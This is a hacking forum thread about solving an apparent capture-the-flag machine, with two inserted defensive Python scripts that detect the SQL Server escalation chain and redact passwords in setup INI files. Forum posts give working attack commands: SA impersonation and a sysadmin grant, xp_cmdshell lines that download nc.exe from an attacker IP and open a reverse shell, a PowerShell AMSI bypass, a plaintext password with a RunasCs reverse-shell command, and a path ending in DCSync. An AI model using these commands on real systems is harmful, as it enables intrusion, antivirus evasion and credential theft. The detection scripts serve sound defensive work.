Posts: 44
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 09:20 AM)ritualist Wrote:
(Jun 02, 2024, 09:07 AM)xss_02 Wrote:
(Jun 02, 2024, 07:50 AM)ritualist Wrote: For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
How to evade AV?
As mentioned previously, you can use nc
xp_cmdshell 'echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
xp_cmdshell '%TEMP%\nc.exe 10.10.X.X 4242 -e powershell'
Can anyone share a hint on what to do after getting sql_svc shell? Tried BloodHound and some basic enumeration and pw spraying, but no success.
What nc.exe did you use? The one from Kali (/usr/share/windows-resources/binaries) is detected.
Posts: 15
Threads: 0
Joined: May 2024
(Jun 02, 2024, 10:04 AM)nomx1337 Wrote:
(Jun 02, 2024, 09:20 AM)ritualist Wrote:
(Jun 02, 2024, 09:07 AM)xss_02 Wrote:
(Jun 02, 2024, 07:50 AM)ritualist Wrote: For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
How to evade AV?
As mentioned previously, you can use nc
xp_cmdshell 'echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
xp_cmdshell '%TEMP%\nc.exe 10.10.X.X 4242 -e powershell'
Can anyone share a hint on what to do after getting sql_svc shell? Tried BloodHound and some basic enumeration and pw spraying, but no success.
What nc.exe did you use? The one from Kali (/usr/share/windows-resources/binaries) is detected.
Try this one https://packetstormsecurity.com/files/31140/nc.exe.html
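The two quoted posts above describe the chain a low-privileged SQL login walks on this box: EXECUTE AS LOGIN to reach sa, sp_addsrvrolemember to join sysadmin, then xp_cmdshell enabled and used to pull a binary with PowerShell. Every one of those steps leaves a record on the server side. The script below is an added example, not code from this thread or from any tool it mentions: it runs simple rules over constructed SQL Server audit records and process-creation events and reports when the full chain has been seen. The record field names are a hypothetical simplification of a SQL audit and an EDR/Sysmon feed; the sample values are constructed, with the statements taken from the posts.

```python
import ntpath
import re

# Constructed sample data (not real logs). The field names are a hypothetical
# simplification of what a SQL Server audit and an EDR/Sysmon process-creation
# feed provide; the T-SQL statements are the ones quoted in the thread.
SQL_AUDIT = [
    {"login": "Freelancer_webapp_user", "statement": "SELECT name FROM sys.databases"},
    {"login": "Freelancer_webapp_user", "statement": "EXECUTE AS LOGIN = 'SA'"},
    {"login": "sa", "statement": "EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'"},
    {"login": "sa", "statement": "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;"},
    {"login": "sa", "statement": "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"},
    {"login": "sa", "statement": "EXEC xp_cmdshell 'echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\\nc.exe | powershell -noprofile'"},
]

SQLSERVR = "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe"
PROCESS_EVENTS = [
    {"parent": SQLSERVR, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\\nc.exe | powershell -noprofile"},
    {"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": SQLSERVR, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c %TEMP%\\nc.exe 10.10.X.X 4242 -e powershell"},
]

# Statement-level rules, in the order the chain is expected to appear.
SQL_RULES = [
    ("impersonation", re.compile(r"\bEXECUTE\s+AS\s+LOGIN\b", re.I)),
    ("sysadmin-grant", re.compile(r"\b(sp_addsrvrolemember|ALTER\s+SERVER\s+ROLE)\b.*\bsysadmin\b", re.I)),
    ("xp_cmdshell-enable", re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)),
    # Require whitespace after the name so the enable statement (quoted name) is not counted twice.
    ("xp_cmdshell-exec", re.compile(r"(?<!')\bxp_cmdshell\s+'", re.I)),
]
CHAIN = [name for name, _ in SQL_RULES]


def scan_sql_audit(records):
    """Return one hit per (record, rule) match, preserving record order."""
    hits = []
    for rec in records:
        for name, pattern in SQL_RULES:
            if pattern.search(rec["statement"]):
                hits.append({"login": rec["login"], "rule": name, "statement": rec["statement"]})
    return hits


def chain_complete(hits):
    """True when every stage of the impersonate -> sysadmin -> xp_cmdshell chain was seen."""
    seen = {h["rule"] for h in hits}
    return all(stage in seen for stage in CHAIN)


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line cues that the spawned shell is fetching something from the network.
DOWNLOAD_CUE = re.compile(r"\b(iwr|invoke-webrequest|curl|certutil|bitsadmin)\b|https?://", re.I)


def scan_process_events(events):
    """Flag shells whose parent is sqlservr.exe, which is what xp_cmdshell produces."""
    hits = []
    for ev in events:
        if ntpath.basename(ev["parent"]).lower() != "sqlservr.exe":
            continue
        if ntpath.basename(ev["image"]).lower() not in SHELLS:
            continue
        tags = ["sqlservr-spawned-shell"]
        if DOWNLOAD_CUE.search(ev["cmdline"]):
            tags.append("download-cue")
        hits.append({"image": ev["image"], "tags": tags, "cmdline": ev["cmdline"]})
    return hits


if __name__ == "__main__":
    sql_hits = scan_sql_audit(SQL_AUDIT)
    for h in sql_hits:
        print(f"[sql]  {h['rule']:<19} login={h['login']}: {h['statement']}")
    print("full chain observed:", chain_complete(sql_hits))
    for h in scan_process_events(PROCESS_EVENTS):
        print(f"[proc] {','.join(h['tags'])}: {h['cmdline']}")
```

The process rule is the one that matters most in practice: a shell with sqlservr.exe as its parent has no legitimate reason to exist on a server where xp_cmdshell is supposed to be off, so it can fire on its own, while the statement rules mainly serve to reconstruct which login started the chain.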
Posts: 19
Threads: 0
Joined: Aug 2023
bypass that fcking AV:
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
Posts: 9
Threads: 1
Joined: Apr 2024
Can someone do a summary?
Posts: 19
Threads: 0
Joined: Aug 2023
Jun 02, 2024, 02:41 PM
(This post was last modified: Jun 02, 2024, 02:45 PM by meoami.)
webpage -> employer -> admin -> sql_rce -> sql_svc -> mikasa shell -> lorra199 -> AD Recycle Bin -> Generic Write to DC -> DCSync to Domain -> root
Posts: 55
Threads: 4
Joined: Apr 2024
(Jun 02, 2024, 02:41 PM)meoami Wrote: webpage -> employer -> admin -> sql_rce -> sql_svc -> mikasa shell -> lorra199 -> AD Recycle Bin -> Generic Write to DC -> DCSync to Domain -> root
Any hint for the mikasa shell?
Posts: 19
Threads: 0
Joined: Aug 2023
There's mikasa's password in
C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU> type sql-Configuration.INI
Upload RunasCs to gain a mikasa shell:
./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r IP:PORT
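The weak point this post relies on is a leftover SQL Server setup configuration file with a password still in it. As an added defensive check, not code from this thread or from RunasCs, the script below scans such an INI for credential-bearing keys, including lines that were only commented out (which configparser would silently skip but which still leak), and produces a redacted copy fit for archiving. The sample INI and its values are constructed; the key names are the ones SQL Server setup itself uses (SAPWD, SQLSVCPASSWORD, AGTSVCPASSWORD).

```python
import re
from dataclasses import dataclass

# Constructed sample modelled on a SQL Server setup configuration file.
# The values are placeholders, not credentials from any real system.
SAMPLE_INI = """; constructed sample modelled on a SQL Server setup configuration file
[OPTIONS]
ACTION="Install"
INSTANCENAME="SQLEXPRESS"
SECURITYMODE="SQL"
SAPWD="ExampleSaPassword!1"
SQLSVCACCOUNT="FREELANCER\\sql_svc"
SQLSVCPASSWORD="ExampleSvcPassword!2"
; AGTSVCPASSWORD="OldAgentPassword!3"
TCPENABLED="1"
"""

# Keys whose value is a secret by naming convention (SAPWD, *PASSWORD, ...).
CRED_KEY = re.compile(r"(PASSWORD|PASSWD|PWD|SECRET|TOKEN)$", re.I)
# key = value, optionally behind a ';' or '#' comment marker; groups keep the
# original spacing so the redacted copy stays byte-for-byte aligned otherwise.
KV_LINE = re.compile(r"^(?P<lead>\s*(?P<comment>[;#])?\s*)(?P<key>[A-Za-z0-9_.\-]+)(?P<eq>\s*=\s*)(?P<value>.*)$")
SECTION = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")


@dataclass
class Finding:
    section: str
    key: str
    commented: bool   # True when the line is commented out but still carries a value
    line_no: int


def find_credential_keys(text):
    """List every credential-bearing key in the INI text, commented or not."""
    findings = []
    section = ""
    for n, line in enumerate(text.splitlines(), 1):
        m = SECTION.match(line)
        if m:
            section = m.group("name")
            continue
        m = KV_LINE.match(line)
        if not m or not CRED_KEY.search(m.group("key")):
            continue
        findings.append(Finding(section, m.group("key"), m.group("comment") is not None, n))
    return findings


def redact(text):
    """Return the INI text with every credential value replaced by a marker."""
    out = []
    for line in text.splitlines():
        m = KV_LINE.match(line)
        if m and CRED_KEY.search(m.group("key")):
            line = f'{m.group("lead")}{m.group("key")}{m.group("eq")}"<REDACTED>"'
        out.append(line)
    return "\n".join(out) + ("\n" if text.endswith("\n") else "")


if __name__ == "__main__":
    for f in find_credential_keys(SAMPLE_INI):
        state = "commented-out" if f.commented else "active"
        print(f"line {f.line_no}: [{f.section}] {f.key} ({state})")
    print(redact(SAMPLE_INI))
```

On a real host the same scan would be pointed at the install media directory and at any ConfigurationFile.ini left under the setup bootstrap log folder; the right fix is deleting the file once setup has finished, and the redacted copy is only for the case where the file has to be kept for change records.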
Posts: 19
Threads: 0
Joined: Aug 2023
Jun 02, 2024, 03:08 PM
(This post was last modified: Jun 02, 2024, 03:10 PM by meoami.)
https://github[.]com/ufrisk/MemProcFS
This may be useful; then try to bypass AMSI and dump something.
Posts: 28
Threads: 1
Joined: Dec 2023
I'm stuck with the passwords from the memory dump but can't seem to get a shell with either password that came out of it. How do I get a shell using these? I think the password isn't exactly the same as either of these.
Posts: 3
Threads: 0
Joined: Jun 2024
(Jun 02, 2024, 06:36 AM)xss_02 Wrote:
(Jun 02, 2024, 05:33 AM)jj00 Wrote: I'm not able to get port 80! Any idea what is blocking?
change vpn to EU - Release arena
That worked like a charm! Thanks.